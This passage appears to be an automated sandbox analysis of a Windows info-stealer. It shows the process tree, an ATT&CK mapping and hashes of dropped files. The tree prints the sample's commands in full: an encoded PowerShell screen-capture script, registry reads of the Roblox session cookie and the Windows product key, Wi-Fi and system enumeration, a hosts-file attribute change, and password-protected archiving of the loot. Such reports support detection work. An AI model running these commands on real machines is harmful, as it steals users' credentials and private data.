    - System Location Discovery: System Language Discovery
    PID:4080
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:2824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1796
  - - C:\Windows\SysWOW64\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1376
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4464
  - - C:\Windows\SysWOW64\systeminfo.exe
      systeminfo
      4⤵
      System Location Discovery: System Language Discovery
      Gathers system information
      PID:4864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3932
  - - C:\Windows\SysWOW64\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      System Location Discovery: System Language Discovery
      PID:2712
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4060
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2892
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c1xku4ue\c1xku4ue.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3480
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCC39.tmp" "c:\Users\Admin\AppData\Local\Temp\c1xku4ue\CSC7AE79EAA82364F6AA2222180B7889FE.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3604
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:4196
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:460
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:3480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4484
  - - C:\Windows\SysWOW64\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:3020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4848
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:1132
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1928
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:1676
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2368
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3736
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:2824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4776
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:3716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4668
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3716
  - - C:\Windows\SysWOW64\getmac.exe
      getmac
      4⤵
      System Location Discovery: System Language Discovery
      PID:4776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:880
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2892
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI50762\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\3WUOF.zip" *"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2192
  - - C:\Users\Admin\AppData\Local\Temp\_MEI50762\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI50762\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\3WUOF.zip" *
      4⤵
      Executes dropped EXE
      PID:3968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3112
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1512
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2160
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      System Location Discovery: System Language Discovery
      PID:4080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4468
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3020
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      System Location Discovery: System Language Discovery
      PID:220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1168
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4448
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1692
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      System Location Discovery: System Language Discovery
      Detects videocard installed
      PID:1880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2592
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:5048

C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:2712

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
bdf103ecadf2098f1a4af55b65cd072a

SHA1
cd0c398d2c35946a65653d8f5be64681dff0ac96

SHA256
3026e82835ee98106040a6da7252950f518e6fb3449bfd2293d7f9abbb19918a

SHA512
ef8ec609de440269cb7597041b3df164a7d83141b038003f26b782de53c0a0de4b985576c862d7a637a6b3d8201267c45c22d726b1d76fd66793a211b81463c6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
bda4d0458b58d0e6fbf192d9254de6df

SHA1
75503dd3d17cd6325bbd5258b1145dba9a43e3fd

SHA256
2693c79833f4a61b41bd3829a4cf95494870590298d6e2d1519aac249043f537

SHA512
c07cdddfcbf2d9e27402bbf55bcb72e7d164028e44793ea591985be12726be7f702879a1b91e23e83385d814cbbbc4cda8a7706dc41136bfe181fdd7e52e954e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
0f32385c8740358b185b7b11c5e78362

SHA1
7de6fbd3be85db9bd9baad21d82c2e7d930dbd28

SHA256
5dfd5ec0cab43785ad355d7a25818b9aef70932efc72cbde17caac48ede0a8dc

SHA512
d5e74a0f587653ca5875e86d4f05fc938032496652240cfaf63f6c5fd82432754f3508219b31c4040bb37f077f2a2231c66699e5118d431c627602e07e6c6865

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
25d4a8a6fe7ba4f20ed94519299594b3

SHA1
f6be57acafb4304c65ad453cdd37439414b91211

SHA256
c3fd5b724263fcb379dbfc87fa0405b198cfaff843bc9a1717ff34759b12bd5b

SHA512
fbafefc0ee14f7acec62651c8cd71dc6faa26b2bc5746ea33ffddc6bb49a6a9b921bcbcc39b0a44a5c420f70d7eaf263d23365fe2a1d1125a8a99c0aac7745a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
3663efc3a7bfc694ab0497e4125df1b4

SHA1
ff9e7b116da867a6b1855c8f7d2719a5b1b6c613

SHA256
478472f25bb7102a89a70c5cad49a3c78d8dc06e7bc74b9329326124ef335a10

SHA512
139468a2e430fcd993542e75eb5fa5a8a7e896318e6a5d9138107217ec2c93a3049f04d8f14ee153cfbf780e3982ab5391ef5d7ef19118fa02bafb6696f7a4a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
eed6fb781545213867e28bed64032612

SHA1
05502f9b97efd2f2b614135f944047b136882e30

SHA256
0916e0e56510a057c6639c73ab1f5e1c89d98b302d9b25a6e5e35d4cc178aa06

SHA512
2733fd9e1e9bf2afd2c6ea042fa4eda40a03a58d57dd6c146d04488344cb6cd93fb3b44f795f6702e8bd0e893383081f6eef12ed585535e5336ebf8d8b8bce83

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESCC39.tmp

Filesize
1KB

MD5
5a1598e443183c11c26962039743ef5e

SHA1
2b134c28463ddee9d2042dea5a5ac15c7e8ee915

SHA256
5322e378a3032bbb4e94e92b18cc6096c7efa4677fda1cbee2276aedd0771207

SHA512
2ffd04f8016dfd60e52adb6704b542afbd02aa475ee106f252f5014927b1f95803f53de84e75f43bf418f6c45df2bd2df3fc9bea821fb8fb27e137a625c0997d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50762\VCRUNTIME140.dll

Filesize
87KB

MD5
656ffcbfe10e81b64a59f7bfc86581ea

SHA1
765fe7b0bd404cb6fabb1b16372f2e41889f087b

SHA256
e72cb60bc3afaed6f38fa28d7111938067a9e4bed38a36f7a1ac6b9c1f16d0e2

SHA512
c5dfc2991cc382d5f9a03219f3e58c3c51b1baa77972d97548fa89b2c5a37d3eb80b1c7e2dae3e3336d02b755a53d78751f49d60250c4cb6ebcaa7a7756e1a18

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50762\_bz2.pyd

Filesize
44KB

MD5
a5d63dcb9cb38f2e09d31c185dd6d533

SHA1
7c840b640dfc64eb0a211b2ed633cc9606722117

SHA256
16b1069936674b1a133abe5286d52d2bd8297364eeb148052c7363f22a5655ba

SHA512
db5d7d95f03e67e2e6bacf812da443aaf139d83987705583a4e8050cadf18b7f9da4c724970d23fe912cd5ee0f78b0368ffd272a8c04723a9a9e612d59e12d35

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50762\_ctypes.pyd

Filesize
55KB

MD5
03237d39f202c5ca4fdddd24961a1a90

SHA1
1e88f87648bd1a8830a1b9b4deb6de0ad109e8ad

SHA256
2fed29b5ca160ff2616b08ddaa29d4a734624efabdbca3b38b116835ead9c477

SHA512
31270c821dd12ab47352382a5a4f0e5682998edab38f889ed2694ccf0c425cee85fee646ed65f4696038cf4b28b097fd5d0c9134b29b290c0a40e60084292158

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50762\_decimal.pyd

Filesize
91KB

MD5
51ff75f20bd4fdcb56856071ec5ea83b

SHA1
7e758202fd2c09dc93b0ce012a8745003c6bfa29

SHA256
36e74ceda1389e996ff20e31f4d60a445ddb292243345f767d9985415be09b26

SHA512
